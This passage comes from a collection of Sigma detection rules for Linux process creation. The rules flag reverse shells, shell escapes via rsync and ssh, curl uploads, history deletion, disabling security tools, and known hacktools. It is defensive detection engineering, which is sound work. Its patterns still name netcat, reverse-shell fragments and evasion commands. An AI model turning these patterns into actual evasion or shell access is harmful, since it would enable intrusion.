172.26.'\n            - ' 172.27.'\n            - ' 172.28.'\n            - ' 172.29.'\n            - ' 172.30.'\n            - ' 172.31.'\n            - ' 127.' # 127.0.0.0/8\n            - ' 169.254.' # 169.254.0.0/16\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_remove_package.yml",
    "content": "title: Linux Package Uninstall\nid: 95d61234-7f56-465c-6f2d-b562c6fedbc4\nstatus: test\ndescription: Detects linux package removal using builtin tools such as \"yum\", \"apt\", \"apt-get\" or \"dpkg\".\nreferences:\n    - https://sysdig.com/blog/mitre-defense-evasion-falco\n    - https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command\n    - https://linuxhint.com/uninstall_yum_package/\n    - https://linuxhint.com/uninstall-debian-packages/\nauthor: Tuan Le (NCSGroup), Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-09\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_yum:\n        Image|endswith: '/yum'\n        CommandLine|contains:\n            - 'erase'\n            - 'remove'\n    selection_apt:\n        Image|endswith:\n            - '/apt'\n            - '/apt-get'\n        CommandLine|contains:\n            - 'remove'\n            - 'purge'\n    selection_dpkg:\n        Image|endswith: '/dpkg'\n        CommandLine|contains:\n            - '--remove '\n            - ' -r '\n    selection_rpm:\n        Image|endswith: '/rpm'\n        CommandLine|contains: ' -e '\n    condition: 1 of selection_*\nfalsepositives:\n    - Administrator or administrator scripts might delete packages for several reasons (debugging, troubleshooting).\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_rsync_shell_execution.yml",
    "content": "title: Shell Execution via Rsync - Linux\nid: e2326866-609f-4015-aea9-7ec634e8aa04\nstatus: experimental\ndescription: |\n    Detects the use of the \"rsync\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\nreferences:\n    - https://gtfobins.github.io/gtfobins/rsync/#shell\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.), Florian Roth\ndate: 2024-09-02\nmodified: 2025-01-18\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith:\n            - '/rsync'\n            - '/rsyncd'\n        CommandLine|contains: ' -e '\n    selection_cli:\n        CommandLine|contains:\n            - '/ash '\n            - '/bash '\n            - '/dash '\n            - '/csh '\n            - '/sh '\n            - '/zsh '\n            - '/tcsh '\n            - '/ksh '\n            - \"'ash \"\n            - \"'bash \"\n            - \"'dash \"\n            - \"'csh \"\n            - \"'sh \"\n            - \"'zsh \"\n            - \"'tcsh \"\n            - \"'ksh \"\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate cases in which \"rsync\" is used to execute a shell\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_rsync_shell_spawn.yml",
    "content": "title: Suspicious Invocation of Shell via Rsync\nid: 297241f3-8108-4b3a-8c15-2dda9f844594\nstatus: experimental\ndescription: |\n    Detects the execution of a shell as sub process of \"rsync\" without the expected command line flag \"-e\" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.\nreferences:\n    - https://sysdig.com/blog/detecting-and-mitigating-cve-2024-12084-rsync-remote-code-execution/\n    - https://gist.github.com/Neo23x0/a20436375a1e26524931dd8ea1a3af10\nauthor: Florian Roth\ndate: 2025-01-18\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.t1203\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '/rsync'\n            - '/rsyncd'\n        Image|endswith:\n            - '/ash'\n            - '/bash'\n            - '/csh'\n            - '/dash'\n            - '/ksh'\n            - '/sh'\n            - '/tcsh'\n            - '/zsh'\n    filter_main_expected:\n        CommandLine|contains: ' -e '\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml",
    "content": "title: Potential Ruby Reverse Shell\nid: b8bdac18-c06e-4016-ac30-221553e74f59\nstatus: test\ndescription: Detects execution of ruby with the \"-e\" flag and calls to \"socket\" related functions. This could be an indication of a potential attempt to setup a reverse shell\nreferences:\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n    - https://www.revshells.com/\nauthor: '@d4ns4n_'\ndate: 2023-04-07\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|contains: 'ruby'\n        CommandLine|contains|all:\n            - ' -e'\n            - 'rsocket'\n            - 'TCPSocket'\n        CommandLine|contains:\n            - ' ash'\n            - ' bash'\n            - ' bsh'\n            - ' csh'\n            - ' ksh'\n            - ' pdksh'\n            - ' sh'\n            - ' tcsh'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml",
    "content": "title: Scheduled Cron Task/Job - Linux\nid: 6b14bac8-3e3a-4324-8109-42f0546a347f\nstatus: test\ndescription: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-06\nmodified: 2022-11-27\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1053.003\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: 'crontab'\n        CommandLine|contains: '/tmp/'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml",
    "content": "title: Security Software Discovery - Linux\nid: c9d8b7fd-78e4-44fe-88f6-599135d46d60\nstatus: test\ndescription: Detects usage of system utilities (only grep and egrep for now) to discover security software discovery\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-19\nmodified: 2022-11-27\ntags:\n    - attack.discovery\n    - attack.t1518.001\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith:\n            # You can add more grep variations such as fgrep, rgrep...etc\n            - '/grep'\n            - '/egrep'\n        CommandLine|contains:\n            - 'nessusd'        # nessus vulnerability scanner\n            - 'td-agent'       # fluentd log shipper\n            - 'packetbeat'     # elastic network logger/shipper\n            - 'filebeat'       # elastic log file shipper\n            - 'auditbeat'      # elastic auditing agent/log shipper\n            - 'osqueryd'       # facebook osquery\n            - 'cbagentd'       # carbon black\n            - 'falcond'        # crowdstrike falcon\n    condition: selection\nfalsepositives:\n    - Legitimate activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml",
    "content": "title: Disabling Security Tools\nid: e3a8a052-111f-4606-9aee-f28ebeb76776\nstatus: test\ndescription: Detects disabling security tools\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md\nauthor: Ömer Günal, Alejandro Ortuno, oscd.community\ndate: 2020-06-17\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_iptables_1:\n        Image|endswith: '/service'\n        CommandLine|contains|all:\n            - 'iptables'\n            - 'stop'\n    selection_iptables_2:\n        Image|endswith: '/service'\n        CommandLine|contains|all:\n            - 'ip6tables'\n            - 'stop'\n    selection_iptables_3:\n        Image|endswith: '/chkconfig'\n        CommandLine|contains|all:\n            - 'iptables'\n            - 'stop'\n    selection_iptables_4:\n        Image|endswith: '/chkconfig'\n        CommandLine|contains|all:\n            - 'ip6tables'\n            - 'stop'\n    selection_firewall_1:\n        Image|endswith: '/systemctl'\n        CommandLine|contains|all:\n            - 'firewalld'\n            - 'stop'\n    selection_firewall_2:\n        Image|endswith: '/systemctl'\n        CommandLine|contains|all:\n            - 'firewalld'\n            - 'disable'\n    selection_carbonblack_1:\n        Image|endswith: '/service'\n        CommandLine|contains|all:\n            - 'cbdaemon'\n            - 'stop'\n    selection_carbonblack_2:\n        Image|endswith: '/chkconfig'\n        CommandLine|contains|all:\n            - 'cbdaemon'\n            - 'off'\n    selection_carbonblack_3:\n        Image|endswith: '/systemctl'\n        CommandLine|contains|all:\n            - 'cbdaemon'\n            - 'stop'\n    selection_carbonblack_4:\n        Image|endswith: '/systemctl'\n        CommandLine|contains|all:\n            - 'cbdaemon'\n            - 'disable'\n    selection_selinux:\n        Image|endswith: '/setenforce'\n        CommandLine|contains: '0'\n    selection_crowdstrike_1:\n        Image|endswith: '/systemctl'\n        CommandLine|contains|all:\n            - 'stop'\n            - 'falcon-sensor'\n    selection_crowdstrike_2:\n        Image|endswith: '/systemctl'\n        CommandLine|contains|all:\n            - 'disable'\n            - 'falcon-sensor'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml",
    "content": "title: Disable Or Stop Services\nid: de25eeb8-3655-4643-ac3a-b662d3f26b6b\nstatus: test\ndescription: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services\nreferences:\n    - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-15\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith:\n            - '/service'\n            - '/systemctl'\n            - '/chkconfig'\n        CommandLine|contains:\n            - 'stop'\n            - 'disable'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml",
    "content": "title: Setuid and Setgid\nid: c21c4eaa-ba2e-419a-92b2-8371703cbe21\nstatus: test\ndescription: Detects suspicious change of file privileges with chown and chmod commands\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md\nauthor: Ömer Günal\ndate: 2020-06-16\nmodified: 2022-10-05\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1548.001\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_root:\n        CommandLine|contains: 'chown root'\n    selection_perm:\n        CommandLine|contains:\n            - ' chmod u+s'\n            - ' chmod g+s'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_ssh_shell_execution.yml",
    "content": "title: Shell Invocation Via Ssh - Linux\nid: 8737b7f6-8df3-4bb7-b1da-06019b99b687\nstatus: test\ndescription: |\n    Detects the use of the \"ssh\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\nreferences:\n    - https://gtfobins.github.io/gtfobins/ssh/\n    - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-08-29\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/ssh'\n        CommandLine|contains:\n            - 'ProxyCommand=;'\n            - 'permitlocalcommand=yes'\n            - 'localhost'\n    selection_cli:\n        CommandLine|contains:\n            - '/bin/bash'\n            - '/bin/dash'\n            - '/bin/fish'\n            - '/bin/sh'\n            - '/bin/zsh'\n            - 'sh 0<&2 1>&2'\n            - 'sh 1>&2 0<&2'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml",
    "content": "title: Potential Linux Amazon SSM Agent Hijacking\nid: f9b3edc5-3322-4fc7-8aa3-245d646cc4b7\nstatus: test\ndescription: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.\nreferences:\n    - https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan\n    - https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/\n    - https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/\nauthor: Muhammad Faisal\ndate: 2023-08-03\ntags:\n    - attack.command-and-control\n    - attack.persistence\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/amazon-ssm-agent'\n        CommandLine|contains|all:\n            - '-register '\n            - '-code '\n            - '-id '\n            - '-region '\n    condition: selection\nfalsepositives:\n    - Legitimate activity of system administrators\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml",
    "content": "title: Chmod Suspicious Directory\nid: 6419afd1-3742-47a5-a7e6-b50386cd15f8\nstatus: test\ndescription: Detects chmod targeting files in abnormal directory paths.\nreferences:\n    - https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md\nauthor: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'\ndate: 2022-06-03\ntags:\n    - attack.defense-evasion\n    - attack.t1222.002\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/chmod'\n        CommandLine|contains:\n            - '/tmp/'\n            - '/.Library/'\n            - '/etc/'\n            - '/opt/'\n    condition: selection\nfalsepositives:\n    - Admin changing file permissions.\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml",
    "content": "title: Container Residence Discovery Via Proc Virtual FS\nid: 746c86fb-ccda-4816-8997-01386263acc4\nstatus: test\ndescription: Detects potential container discovery via listing of certain kernel features in the \"/proc\" virtual filesystem\nreferences:\n    - https://blog.skyplabs.net/posts/container-detection/\n    - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker\ntags:\n    - attack.discovery\n    - attack.t1082\nauthor: Seth Hanford\ndate: 2023-08-23\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_tools:\n        Image|endswith:\n            - 'awk'\n            - '/cat'\n            - 'grep'\n            - '/head'\n            - '/less'\n            - '/more'\n            - '/nl'\n            - '/tail'\n    selection_procfs_kthreadd:  # outside containers, PID 2 == kthreadd\n        CommandLine|contains: '/proc/2/'\n    selection_procfs_target:\n        CommandLine|contains: '/proc/'\n        CommandLine|endswith:\n            - '/cgroup'  # cgroups end in ':/' outside containers\n            - '/sched'   # PID mismatch when run in containers\n    condition: selection_tools and 1 of selection_procfs_*\nfalsepositives:\n    - Legitimate system administrator usage of these commands\n    - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml",
    "content": "title: Suspicious Curl File Upload - Linux\nid: 00b90cc1-17ec-402c-96ad-3a8117d7a582\nrelated:\n    - id: 00bca14a-df4e-4649-9054-3f2aa676bc04\n      type: derived\nstatus: test\ndescription: Detects a suspicious curl process start the adds a file to a web request\nreferences:\n    - https://twitter.com/d1r4c/status/1279042657508081664\n    - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file\n    - https://curl.se/docs/manpage.html\n    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\nauthor: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update)\ndate: 2022-09-15\nmodified: 2023-05-02\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1567\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/curl'\n    selection_cli:\n        - CommandLine|contains:\n              - ' --form' # Also covers the \"--form-string\"\n              - ' --upload-file '\n              - ' --data '\n              - ' --data-' # For flags like: \"--data-ascii\", \"--data-binary\", \"--data-raw\", \"--data-urlencode\"\n        - CommandLine|re: '\\s-[FTd]\\s' # We use regex to ensure a case sensitive argument detection\n    filter_optional_localhost:\n        CommandLine|contains:\n            - '://localhost'\n            - '://127.0.0.1'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Scripts created by developers and admins\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml",
    "content": "title: Suspicious Curl Change User Agents - Linux\nid: b86d356d-6093-443d-971c-9b07db583c68\nrelated:\n    - id: 3286d37a-00fd-41c2-a624-a672dcd34e60\n      type: derived\nstatus: test\ndescription: Detects a suspicious curl process start on linux with set useragent options\nreferences:\n    - https://curl.se/docs/manpage.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-15\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/curl'\n        CommandLine|contains:\n            - ' -A '\n            - ' --user-agent '\n    condition: selection\nfalsepositives:\n    - Scripts created by developers and admins\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml",
    "content": "title: Docker Container Discovery Via Dockerenv Listing\nid: 11701de9-d5a5-44aa-8238-84252f131895\nstatus: test\ndescription: Detects listing or file reading of \".dockerenv\" which can be a sing of potential container discovery\nreferences:\n    - https://blog.skyplabs.net/posts/container-detection/\n    - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker\ntags:\n    - attack.discovery\n    - attack.t1082\nauthor: Seth Hanford\ndate: 2023-08-23\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith:\n            # Note: add additional tools and utilities to increase coverage\n            - '/cat'\n            - '/dir'\n            - '/find'\n            - '/ls'\n            - '/stat'\n            - '/test'\n            - 'grep'\n        CommandLine|endswith: '.dockerenv'\n    condition: selection\nfalsepositives:\n    - Legitimate system administrator usage of these commands\n    - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml",
    "content": "title: Potentially Suspicious Execution From Tmp Folder\nid: 312b42b1-bded-4441-8b58-163a3af58775\nstatus: test\ndescription: Detects a potentially suspicious execution of a process located in the '/tmp/' folder\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\nmodified: 2025-08-05\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|startswith: '/tmp/'\n    filter_optional_nextcloud:\n        Image|endswith: '/usr/bin/nextcloud'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml",
    "content": "title: Potential Discovery Activity Using Find - Linux\nid: 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf\nrelated:\n    - id: 85de3a19-b675-4a51-bfc6-b11a5186c971\n      type: similar\nstatus: test\ndescription: Detects usage of \"find\" binary in a suspicious manner to perform discovery\nreferences:\n    - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-28\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/find'\n        CommandLine|contains:\n            - '-perm -4000'\n            - '-perm -2000'\n            - '-perm 0777'\n            - '-perm -222'\n            - '-perm -o w'\n            - '-perm -o x'\n            - '-perm -u=s'\n            - '-perm -g=s'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml",
    "content": "title: Suspicious Git Clone - Linux\nid: cfec9d29-64ec-4a0f-9ffe-0fdb856d5446\nstatus: test\ndescription: Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious\nreferences:\n    - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-03\nmodified: 2023-01-05\ntags:\n    - attack.reconnaissance\n    - attack.t1593.003\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/git'\n        CommandLine|contains: ' clone '\n    selection_keyword:\n        CommandLine|contains:\n            # Add more suspicious keywords\n            - 'exploit'\n            - 'Vulns'\n            - 'vulnerability'\n            - 'RCE'\n            - 'RemoteCodeExecution'\n            - 'Invoke-'\n            - 'CVE-'\n            - 'poc-'\n            - 'ProofOfConcept'\n            # Add more vuln names\n            - 'proxyshell'\n            - 'log4shell'\n            - 'eternalblue'\n            - 'eternal-blue'\n            - 'MS17-'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml",
    "content": "title: History File Deletion\nid: 1182f3b3-e716-4efa-99ab-d2685d04360f\nstatus: test\ndescription: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity\nreferences:\n    - https://github.com/sleventyeleven/linuxprivchecker/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-20\nmodified: 2022-09-15\ntags:\n    - attack.impact\n    - attack.t1565.001\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith:\n            - '/rm'\n            - '/unlink'\n            - '/shred'\n    selection_history:\n        - CommandLine|contains:\n              - '/.bash_history'\n              - '/.zsh_history'\n        - CommandLine|endswith:\n              - '_history'\n              - '.history'\n              - 'zhistory'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate administration activities\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml",
    "content": "title: Print History File Contents\nid: d7821ff1-4527-4e33-9f84-d0d57fa2fb66\nstatus: test\ndescription: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance\nreferences:\n    - https://github.com/sleventyeleven/linuxprivchecker/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-20\nmodified: 2022-09-15\ntags:\n    - attack.reconnaissance\n    - attack.t1592.004\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith:\n            - '/cat'\n            - '/head'\n            - '/tail'\n            - '/more'\n    selection_history:\n        - CommandLine|contains:\n              - '/.bash_history'\n              - '/.zsh_history'\n        - CommandLine|endswith:\n              - '_history'\n              - '.history'\n              - 'zhistory'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_hktl_execution.yml",
    "content": "title: Linux HackTool Execution\nid: a015e032-146d-4717-8944-7a1884122111\nstatus: test\ndescription: Detects known hacktool execution based on image name.\nreferences:\n    - https://github.com/Gui774ume/ebpfkit\n    - https://github.com/pathtofile/bad-bpf\n    - https://github.com/carlospolop/PEASS-ng\n    - https://github.com/t3l3machus/hoaxshell\n    - https://github.com/t3l3machus/Villain\n    - https://github.com/HavocFramework/Havoc\n    - https://github.com/1N3/Sn1per\n    - https://github.com/Ne0nd0g/merlin\n    - https://github.com/Pennyw0rth/NetExec/\nauthor: Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure])\ndate: 2023-01-03\nmodified: 2024-09-19\ntags:\n    - attack.execution\n    - attack.resource-development\n    - attack.t1587\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_c2_frameworks:\n        Image|endswith:\n            - '/crackmapexec'\n            - '/havoc'\n            - '/merlin-agent'\n            - '/merlinServer-Linux-x64'\n            - '/msfconsole'\n            - '/msfvenom'\n            - '/ps-empire server'\n            - '/ps-empire'\n            - '/sliver-client'\n            - '/sliver-server'\n            - '/Villain.py'\n    selection_c2_framework_cobaltstrike:\n        Image|contains:\n            - '/cobaltstrike'\n            - '/teamserver'\n    selection_scanners:\n        Image|endswith:\n            - '/autorecon'\n            - '/httpx'\n            - '/legion'\n            - '/naabu'\n            - '/netdiscover'\n            - '/nuclei'\n            - '/recon-ng'\n    selection_scanners_sniper:\n        Image|contains: '/sniper'\n    selection_web_enum:\n        Image|endswith:\n            - '/dirb'\n            - '/dirbuster'\n            - '/eyewitness'\n            - '/feroxbuster'\n            - '/ffuf'\n            - '/gobuster'\n            - '/wfuzz'\n            - '/whatweb'\n    selection_web_vuln:\n        Image|endswith:\n            - '/joomscan'\n            - '/nikto'\n            - '/wpscan'\n    selection_exploit_tools:\n        Image|endswith:\n            - '/aircrack-ng'\n            - '/bloodhound-python'\n            - '/bpfdos'\n            - '/ebpfki'\n            - '/evil-winrm'\n            - '/hashcat'\n            - '/hoaxshell.py'\n            - '/hydra'\n            - '/john'\n            - '/ncrack'\n            # default binary: https://github.com/Pennyw0rth/NetExec/releases/download/v1.0.0/nxc-ubuntu-latest\n            - '/nxc-ubuntu-latest'\n            - '/pidhide'\n            - '/pspy32'\n            - '/pspy32s'\n            - '/pspy64'\n            - '/pspy64s'\n            - '/setoolkit'\n            - '/sqlmap'\n            - '/writeblocker'\n    selection_linpeas:\n        # covers: all linux versions listed here: https://github.com/carlospolop/PEASS-ng/releases\n        Image|contains: '/linpeas'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml",
    "content": "title: Potential Container Discovery Via Inodes Listing\nid: 43e26eb5-cd58-48d1-8ce9-a273f5d298d8\nstatus: test\ndescription: Detects listing of the inodes of the \"/\" directory to determine if the we are running inside of a container.\nreferences:\n    - https://blog.skyplabs.net/posts/container-detection/\n    - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker\ntags:\n    - attack.discovery\n    - attack.t1082\nauthor: Seth Hanford\ndate: 2023-08-23\nmodified: 2025-11-24\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_ls_img:\n        Image|endswith: '/ls'    # inode outside containers low, inside high\n    selection_ls_cli:\n        - CommandLine|endswith: ' /'\n        - CommandLine|contains: ' / '\n    selection_regex_inode:\n        CommandLine|re: '(?:\\s-[^-\\s]{0,20}i|\\s--inode\\s)'      # -i finds inode number\n    selection_regex_dir:\n        CommandLine|re: '(?:\\s-[^-\\s]{0,20}d|\\s--directory\\s)'  # -d gets directory itself, not contents\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate system administrator usage of these commands\n    - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml",
    "content": "title: Interactive Bash Suspicious Children\nid: ea3ecad2-db86-4a89-ad0b-132a10d2db55\nstatus: test\ndescription: Detects suspicious interactive bash as a parent to rather uncommon child processes\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-14\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1059.004\n    - attack.t1036\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        ParentCommandLine: 'bash -i'\n    anomaly1:\n        CommandLine|contains:\n            - '-c import '\n            - 'base64'\n            - 'pty.spawn'\n    anomaly2:\n        Image|endswith:\n            - 'whoami'\n            - 'iptables'\n            - '/ncat'\n            - '/nc'\n            - '/netcat'\n    condition: selection and 1 of anomaly*\nfalsepositives:\n    - Legitimate software that uses these patterns\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml",
